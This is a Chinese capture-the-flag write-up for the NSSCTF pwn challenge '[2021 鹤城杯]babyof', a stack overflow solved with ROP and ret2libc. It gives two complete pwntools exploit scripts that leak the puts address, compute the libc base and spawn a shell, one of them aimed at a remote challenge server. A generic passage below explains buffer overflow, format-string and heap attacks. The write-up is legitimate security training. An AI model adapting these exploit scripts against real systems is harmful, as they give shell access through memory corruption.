NSSCTF刷题笔记pwn10——[2021 鹤城杯]babyof

朴实无华的栈溢出,没有system函数,也没有/bin/sh字符串,也没有给libc文件

但是我们有puts可以泄露数据

from pwn import *
from LibcSearcher import *
context(arch="amd64")
io = process('./babyof')
elf = ELF('./babyof')

puts_plt = elf.plt['puts']
puts_got = elf.got['puts']

main_addr = 0x40066b
pop_rdi_ret = 0x400743
ret_addr = 0x400506


payload = flat([b'A'*0x48,pop_rdi_ret,puts_got,puts_plt,main_addr])
io.recvline()
io.sendline(payload)
io.recvuntil('I hope you win\n')
puts_addr = int(unpack(io.recvuntil('\n',drop=True).ljust(8,b'\x00')))

libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
bin_sh = libc_base + libc.dump('str_bin_sh')

payload2 = flat([b'A'*0x48,pop_rdi_ret,bin_sh,system_addr])
io.sendline(payload2)
io.interactive()

这是通过libcsearcher获取偏移的代码,可惜在这题好像行不通,但是思路是这样子的

通过泄露目标的函数地址,我可以确定目标使用的是这两个libc文件

libc database search (blukat.me)

然后是修改过后的代码,基本上没差

from pwn import *
from LibcSearcher import *
context(arch="amd64")
#io = process('./babyof')
io = remote('node4.anna.nssctf.cn',28711)
elf = ELF('./babyof')

puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
read_got = elf.got['read']
setvbuf = elf.got['setvbuf']

main_addr = 0x40066b
pop_rdi_ret = 0x400743
ret_addr = 0x400506


payload = flat([b'A'*0x48,pop_rdi_ret,puts_got,puts_plt,main_addr])
io.recvline()
io.sendline(payload)
io.recvuntil('I hope you win\n')
puts_addr = int(unpack(io.recvuntil('\n',drop=True).ljust(8,b'\x00')))
print(hex(puts_addr))

libc_puts = 0x80aa0
libc_base = puts_addr - libc_puts
system_addr = libc_base + 0x4f550
bin_sh = libc_base + 0x1b3e1a
payload2 = flat([b'A'*0x48,ret_addr,pop_rdi_ret,bin_sh,system_addr])
io.sendline(payload2)
io.interactive()

  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
你好!很高兴回答你的问题。关于软件安全实验二中的攻击方式Pwn,我可以为你提供一些基本的信息。Pwn是指通过利用软件漏洞来获取对计算机系统的控制权。在实验二中,你可能会学习和尝试使用缓冲区溢出漏洞、格式化字符串漏洞、堆溢出等技术来进行Pwn攻击。 缓冲区溢出是一种常见的Pwn攻击技术,它利用了程序在处理输入数据时没有正确限制长度的漏洞。通过向程序输入过长的数据,可以覆盖到程序运行时的内存空间中的其他重要数据,例如返回地址。通过修改返回地址,攻击者可以控制程序流程,执行恶意代码。 格式化字符串漏洞是另一种常见的Pwn攻击技术。它利用了C语言的格式化字符串函数(如printf、sprintf等)在处理格式化字符串时存在的安全问题。通过向程序输入特定格式的字符串,攻击者可以读取或修改内存中的数据,甚至执行任意代码。 堆溢出是利用堆内存管理中的漏洞进行攻击的一种技术。在使用动态分配内存时,如果没有正确地释放或管理内存,可能会导致堆溢出。通过在堆中溢出写入数据,攻击者可以修改关键数据结构,从而影响程序的执行逻辑。 以上只是Pwn攻击的一些基本概念,实际的Pwn攻击还涉及很多技术和细节。在进行任何Pwn攻击之前,请务必遵循法律和道德规范,并确保你在合法授权的环境中进行实验。 如果你有任何关于Pwn攻击或软件安全实验的具体问题,我会尽力为你解答。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值